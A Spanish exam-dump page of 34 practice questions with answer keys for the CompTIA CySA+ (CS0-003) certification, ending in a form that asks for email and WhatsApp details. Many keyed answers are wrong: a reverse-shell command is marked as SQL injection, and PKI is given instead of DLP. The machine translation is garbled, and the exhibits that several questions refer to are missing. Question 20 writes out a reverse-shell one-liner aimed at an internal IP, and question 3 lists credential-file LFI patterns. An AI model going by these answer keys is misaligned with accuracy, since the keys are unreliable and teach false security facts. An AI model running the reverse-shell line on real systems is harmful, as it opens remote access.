¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

CompTIA CS0-003 Preguntas y Respuestas del Examen de Certificación, Analista de Ciberseguridad de CompTIA (CySA+) | SPOTO

Prepárese para el Examen de Certificación CompTIA CS0-003 con nuestra completa colección de pruebas de práctica. Nuestra plataforma ofrece una diversa gama de materiales de examen, incluidas pruebas gratuitas, preguntas de muestra, exámenes de prueba y más. Acceda a preguntas y respuestas de exámenes elaboradas por expertos en el campo para mejorar su preparación para el examen. Utilice nuestro simulador de examen en línea para simular situaciones reales de examen y evaluar su preparación. Con nuestros volcados de examen, obtendrá información valiosa sobre la estructura y el contenido del examen, lo que le garantizará confianza el día del examen. Ya sea que busque reforzar su conocimiento o familiarizarse con los patrones del examen, nuestras pruebas de práctica proporcionan el recurso ideal para el éxito en el examen de certificación de Analista de Ciberseguridad de CompTIA (CySA+).
Realizar otros exámenes en línea

Cuestionar #1
¿Cuál de las siguientes iniciativas organizativas se vería MÁS afectada por los problemas de seguridad de los datos?
A. Pasar a un entorno basado en la nube
B. Migración a servidores virtuales alojados localmente
C. Implantación de controles de no repudio
D. Encriptar consultas a bases de datos locales
Ver respuesta
Respuesta correcta: C
Cuestionar #2
Un analista de seguridad se ha unido recientemente al equipo y está intentando determinar qué lenguaje de scripting se está utilizando en un script de producción para determinar si es malicioso. Dado el siguiente script: ¿Cuál de los siguientes lenguajes de scripting se utilizó en el script?
A. PowerShel
B. Ruby
C. Python
D. Script de shell
Ver respuesta
Respuesta correcta: A
Cuestionar #3
Un analista de seguridad descubre una vulnerabilidad LFI que puede ser explotada para extraer credenciales del host subyacente. Cuál de los siguientes patrones puede utilizar el analista de seguridad para buscar en los registros del servidor web pruebas de la explotación de esa vulnerabilidad concreta?
A. /etc/ shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
Ver respuesta
Respuesta correcta: A
Cuestionar #4
¿Cuál de las siguientes es la MEJOR manera de recopilar información sobre parches en un servidor específico?
A. Visor de eventos
B. Script personalizado
C. Software SCAP
D. CI/CD
Ver respuesta
Respuesta correcta: D
Cuestionar #5
El Director de Seguridad de la Información está dirigiendo un nuevo programa para reducir los riesgos y amenazas de la superficie de ataque como parte de un enfoque de confianza cero. El equipo de seguridad de TI debe establecer prioridades para el programa. ¿Cuál de las siguientes es la mejor prioridad basada en marcos de ataque comunes?
A. Reducir las cuentas de administrador y de acceso privilegiado
B. Emplear un IDS basado en red
C. Llevar a cabo una respuesta exhaustiva a los incidentes
D. Habilitar SSO a aplicaciones empresariales
Ver respuesta
Respuesta correcta: C
Cuestionar #6
Una organización tiene la siguiente política de mitigación de riesgos: Los riesgos con una probabilidad del 95% o superior se abordarán antes que todos los demás, independientemente de su impacto. Todas las demás prioridades se basarán en el valor del riesgo. La organización ha identificado los siguientes riesgos: ¿Cuál de los siguientes es el orden de prioridad para la mitigación de riesgos de mayor a menor?
A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B
Ver respuesta
Respuesta correcta: C
Cuestionar #7
Dada la siguiente cadena CVSS- CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H ¿Cuál de los siguientes atributos describe correctamente esta vulnerabilidad?
A. Se necesita un usuario para explotar esta vulnerabilidad
B. La vulnerabilidad se basa en la red
C. La vulnerabilidad no afecta a la confidencialidad
D. La complejidad para explotar la vulnerabilidad es altA
Ver respuesta
Respuesta correcta: B
Cuestionar #8
Mientras revisaba los registros del servidor web, un analista de seguridad encontró la siguiente línea: ¿Cuál de las siguientes actividades maliciosas se intentó?
A. Inyección de comandos
B. Inyección XML
C. Falsificación de peticiones del lado del servidor
D. Secuencias de comandos en sitios cruzados
Ver respuesta
Respuesta correcta: D
Cuestionar #9
Mientras revisa los registros del servidor web, un analista observa varias entradas con las mismas marcas de tiempo, pero todas contienen caracteres extraños en la línea de solicitud. ¿Cuál de los siguientes pasos debe seguirse?
A. Apague la red inmediatamente y llame a la siguiente persona en la cadena de mando
B. Determine de qué ataque son indicativos los caracteres impares
C. Utilizar el marco de ataque correcto y determinar en qué consistirá la respuesta al incidente
D. Notificar a las fuerzas de seguridad locales la respuesta al incidente
Ver respuesta
Respuesta correcta: D
Cuestionar #10
¿Cuál de los siguientes es el primer paso que debe darse al establecer un plan de recuperación en caso de catástrofe?
A. Acordar las metas y objetivos del plan
B. Determinar el emplazamiento que se utilizará durante una catástrofeC Demostrar el cumplimiento de un proceso estándar de recuperación en caso de catástrofe
C. Aplicaciones de identidad que deben ejecutarse durante una catástrofe
Ver respuesta
Respuesta correcta: A
Cuestionar #11
¿Cuál de las siguientes es la mejor métrica en la que debe centrarse una organización dadas las recientes inversiones en SIEM, SOAR y un sistema de tickets?
A. Tiempo medio de detección
B. Número de exploits por táctica
C. Volumen de alerta
D. Cantidad de intentos de intrusión
Ver respuesta
Respuesta correcta: A
Cuestionar #12
Un empleado accedió a un sitio web que provocó que un dispositivo se infectara con malware invasivo. El analista de respuesta a incidentes ha: ? creado el registro inicial de pruebas. desactivado el adaptador inalámbrico del dispositivo. entrevistó al empleado, que no pudo identificar el sitio web al que accedió. Revisó los registros de tráfico del proxy web. ¿Cuál de las siguientes acciones debe llevar a cabo el analista para reparar el dispositivo infectado?
A. Actualizar el firmware del sistema y reimaginar el hardware
B. Instalar un escáner de malware adicional que envíe alertas por correo electrónico al analistA
C. Configurar el sistema para que utilice un servidor proxy para el acceso a Internet
D. Eliminar el perfil de usuario y restaurar los datos desde la copia de seguridad
Ver respuesta
Respuesta correcta: A
Cuestionar #13
Una empresa manufacturera recurre a un proveedor de servicios externo para el soporte de seguridad de primer nivel. Uno de los requisitos es que el proveedor sólo debe obtener talentos de su propio país debido a intereses geopolíticos y de seguridad nacional. ¿Cuál de las siguientes medidas puede aplicar la empresa de fabricación para garantizar que el proveedor externo de servicios cumple este requisito?
A. Implantar un programa de cadena de suministro segura con gobernanzA
B. Implementar una lista negra para las direcciones IP de fuera del condado
C. Implantar controles de autenticación fuertes para los contratistas
D. Implantar análisis del comportamiento de los usuarios para los miembros clave del personal
Ver respuesta
Respuesta correcta: A
Cuestionar #14
Un analista de seguridad informática ha recibido una alerta por correo electrónico sobre una vulnerabilidad en la nueva flota de vehículos que la empresa ha adquirido recientemente. ¿A cuál de los siguientes vectores de ataque se dirige MÁS probablemente la vulnerabilidad?
A. SCADA
B. Bus CAN
C. Modbus
D. loT
Ver respuesta
Respuesta correcta: A
Cuestionar #15
¿Cuál de las siguientes opciones ayudaría a un analista a averiguar rápidamente si la dirección IP de una alerta SIEM es una dirección IP maliciosa conocida?
A. Únase a un centro de intercambio y análisis de información específico del sector de la empresA
B. Cargar la información sobre amenazas en el IPS en formato STIX/TAXII
C. Añadir enriquecimiento de datos para IPS en la tubería de ingestión
D. Revise los feeds de amenazas despues de ver la alerta SIEM
Ver respuesta
Respuesta correcta: A
Cuestionar #16
Un analista de seguridad está intentando identificar posibles direcciones de red de diferentes redes de origen pertenecientes a la misma empresa y región. ¿Cuál de las siguientes funciones de shell script podría ayudar a lograr el objetivo?
A. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
Ver respuesta
Respuesta correcta: A
Cuestionar #17
Una reciente vulnerabilidad de día cero está siendo explotada activamente, no requiere interacción del usuario o escalada de privilegios, y tiene un impacto significativo en la confidencialidad y la integridad, pero no en la disponibilidad. ¿Cuál de las siguientes métricas CVE sería más precisa para esta amenaza de día cero?
A. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Ver respuesta
Respuesta correcta: A
Cuestionar #18
Blanco revisando los informes de incidentes de la noche anterior, un analista de seguridad se da cuenta de que los sitios web corporativos fueron desfigurados con propaganda po mcai. ¿Cuál de las siguientes opciones describe MEJOR a este tipo de actor?
A. Hacktivista
B. Estado-nación
C. amenaza interna
D. Crimen organizado
Ver respuesta
Respuesta correcta: C
Cuestionar #19
Un analista se da cuenta de que hay un dispositivo interno enviando tráfico HTTPS con caracteres adicionales en la cabecera a una IP maliciosa conocida en otro país. Cuál de las siguientes opciones describe lo que ha observado el analista?
A. Balizaje
B. Secuencias de comandos en sitios cruzados
C. Desbordamiento del búfer
D. PHP transversal
Ver respuesta
Respuesta correcta: D
Cuestionar #20
Un analista de seguridad detecta un intento de exploit que contiene el siguiente comando: sh -i >& /dev/udp/10.1.1.1/4821 0>$l ¿Cuál de los siguientes se está intentando?
A. RCE
B. Concha invertida
C. XSS
D. Inyección SQL
Ver respuesta
Respuesta correcta: D
Cuestionar #21
Un analista de seguridad está investigando formas de mejorar la seguridad del sistema de correo electrónico de una empresa para mitigar los correos electrónicos que se hacen pasar por ejecutivos de la empresa. Cuál de las siguientes opciones sería la MEJOR para que el analista configure para lograr este objetivo?
A. Un registro TXT en el servidor de nombres para SPF
B. Claves DNSSEC para asegurar la replicación
C. Claves de dominio identificadas Hombre
D. Una caja de arena para comprobar la entrada de mad
Ver respuesta
Respuesta correcta: B
Cuestionar #22
Un analista de seguridad necesita proporcionar al aprendiz de desarrollo una conectividad segura desde la red corporativa a un entorno de nube de tres niveles. Los desarrolladores necesitan acceder a los servidores de los tres niveles para realizar varias tareas de configuración. ¿Cuál de las siguientes tecnologías debería implementar el analista para proporcionar un transporte seguro?
A. CASB
B. VPC
C. Federación
D. VPN
Ver respuesta
Respuesta correcta: C
Cuestionar #23
¿Cuál de las siguientes opciones describe mejor los elementos clave del éxito de un programa de seguridad de la información?
A. Análisis del impacto en la empresa, gestión de activos y cambios, y plan de comunicación sobre seguridad
B. Aplicación de la política de seguridad, asignación de funciones y responsabilidades y clasificación de los activos de información
C. Planificación de la recuperación en caso de catástrofe y de la continuidad de la actividad, y definición de los requisitos de control de acceso y de las políticas de recursos humanos
D. Estructura organizativa de la alta dirección, normas de distribución de mensajes y procedimientos para el funcionamiento de los sistemas de gestión de la seguridad
Ver respuesta
Respuesta correcta: A
Cuestionar #24
Un analista de seguridad está intentando identificar anomalías en el enrutamiento de la red. Cuál de las siguientes funciones puede utilizar el analista en un script de shell para lograr el objetivo con mayor precisión?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Ver respuesta
Respuesta correcta: D
Cuestionar #25
Una organización ha cambiado recientemente sus planes de BC y DR. Cuál de las siguientes opciones permitiría al equipo de respuesta a incidentes probar los cambios sin ningún impacto para la empresa?
A. Realice un simulacro basado en escenarios de incidentes previamente identificados
B. Simular un incidente cortando la alimentación del centro de datos primario
C. Migrar las cargas de trabajo activas del centro de datos primario a la ubicación secundariA
D. Comparar el plan actual con las lecciones aprendidas de incidentes anteriores
Ver respuesta
Respuesta correcta: B
Cuestionar #26
Joe, uno de los principales vendedores de una organización, ha anunciado en las redes sociales que deja su puesto actual para crear una nueva empresa que competirá con su actual empleador. Joe está solicitando los clientes de su actual empleador. Sin embargo, Joe aún no ha dimitido ni ha hablado de ello con su supervisor actual. ¿Cuál de las siguientes medidas recomendaría el equipo de respuesta a incidentes?
A. Aislar el PC de Joe de la red
B. Realice una nueva copia de seguridad del PC siguiendo los procedimientos operativos estándar
C. Iniciar un borrado remoto del PC de Joe utilizando la gestión de dispositivos móviles
D. No realizar ninguna acción hasta que RRHH o el asesor jurídico aconsejen sobre los pasos a seguir
Ver respuesta
Respuesta correcta: B
Cuestionar #27
¿Cuál de las siguientes herramientas funcionaría mejor para evitar la exposición de información de identificación personal fuera de una organización?
A. PAM
B. IDS
C. PKI
D. DLP
Ver respuesta
Respuesta correcta: C
Cuestionar #28
El Director de Seguridad de la Información quiere eliminar y reducir la TI en la sombra en la empresa. Se utilizan varias aplicaciones en la nube de alto riesgo que aumentan el riesgo para la organización. Cuál de las siguientes soluciones ayudará a reducir el riesgo?
A. Implantar un CASB y activar la aplicación de políticas
B. Configurar MFA con acceso estricto
C. Despliegue de una pasarela API
D. Habilitar SSO a las aplicaciones en la nube
Ver respuesta
Respuesta correcta: A
Cuestionar #29
El Director de Información de una empresa desea utilizar una solución CASB para garantizar el cumplimiento de las políticas durante el acceso a la nube. Debido a la naturaleza del negocio de la empresa y al apetito de riesgo, el equipo directivo ha decidido no almacenar información financiera en la nube. Un analista de seguridad necesita recomendar una solución para mitigar la amenaza de fuga de datos financieros a la nube. ¿Cuál de las siguientes debería recomendar el analista?
A. Utilizar el CASB para aplicar la protección de datos en reposo de DLP a la información financiera almacenada en las instalaciones
B. No utilice la solución CASB para este fin, pero añada DLP in situ para los datos en movimiento
C. Utilizar el CASB para aplicar la protección de datos en movimiento de DLP a la información financiera que se traslada a la nube
D. No utilizar la solución CASB para este fin, sino añadir DLP in situ para los datos en reposo
Ver respuesta
Respuesta correcta: C
Cuestionar #30
Un analista de seguridad está revisando la salida de tcpdump para analizar el tipo de actividad en una captura de paquetes: ¿Cuál de los siguientes generó la salida anterior?
A. Un escáner de puertos
B. Una conexión TLS
C. Una exploración de vulnerabilidades
D. Un barrido ping
Ver respuesta
Respuesta correcta: D
Cuestionar #31
Un analista de seguridad ha encontrado el siguiente tráfico DNS sospechoso mientras analizaba una captura de paquetes: ? Tráfico DNS mientras una sesión de túnel está activa. ? El tiempo medio entre consultas es inferior a un segundo. ? La longitud media de las consultas supera los 100 caracteres. ¿Cuál de los siguientes ataques es más probable que se haya producido?
A. Exfiltración de DNS
B. Suplantación de DNS
C. Transferencia de zona DNS
D. Envenenamiento DNS
Ver respuesta
Respuesta correcta: D
Cuestionar #32
Un analista de ciberseguridad observa una actividad inusual de exploración de la red procedente de un país con el que la empresa no hace negocios. Cuál de las siguientes es la mejor técnica de mitigación?
A. Geobloqueo del país de origen infractor
B. Bloquear el rango IP de los escaneos en el cortafuegos de la red
C. Realice un análisis histórico de tendencias y busque actividades de exploración similares
D. Bloquear la direccion IP especifica de los escaneos en el firewall de la red
Ver respuesta
Respuesta correcta: A
Cuestionar #33
Formular una hipótesis, buscar indicadores de compromiso y utilizar los resultados para mejorar de forma proactiva las capacidades de detección son ejemplos del valor de:
A. exploración de vulnerabilidades
B. caza de amenazas
C. aprendizaje en rojo
D. pruebas de penetración
Ver respuesta
Respuesta correcta: B
Cuestionar #34
A un nuevo analista de ciberseguridad se le encarga la creación de un informe ejecutivo sobre las posibles amenazas a la organización. Cuál de las siguientes opciones producirá los datos necesarios para el informe?
A. Registros del cortafuegos
B. Indicadores de compromiso
C. Evaluación de riesgos
D. Listas de control de acceso
Ver respuesta
Respuesta correcta: B

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: